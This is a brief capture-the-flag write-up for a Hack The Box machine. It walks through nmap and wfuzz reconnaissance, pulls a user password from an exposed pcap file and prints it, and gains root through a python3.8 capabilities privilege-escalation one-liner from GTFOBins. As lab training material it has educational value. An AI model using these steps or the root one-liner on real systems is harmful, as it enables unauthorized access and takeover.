This is a write up for HTB machine.
#USER

## Nmap for scan:
> $ path to nmap's script /usr/share/nmap/scripts

> $ nmap -sV --script=nmap-vulners/vulners.nse -v -p- <ip_addr> | tee nmap.log

## Domain bruteforce with wfuzz
> $ wfuzz -c -v -z file,big.txt --hc '404' http://10.10.10.245/FUZZ


## Found some hidden dir.
/data/

## Exploit

In data dir have seems interesting and have some files.
in http://10.10.10.245/data/0 have some pcap file and we can get some packets in it.
The we found natan's pass: Buck3tH4TF0RM3!



--------------------------


#ROOT

Now, use linpeas to gather some more information about this machine.

After analyzing the output I found a capabilities tab that has python3.8

GTFObins will help you to get root:

python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'


// Research how GTFOBins works.
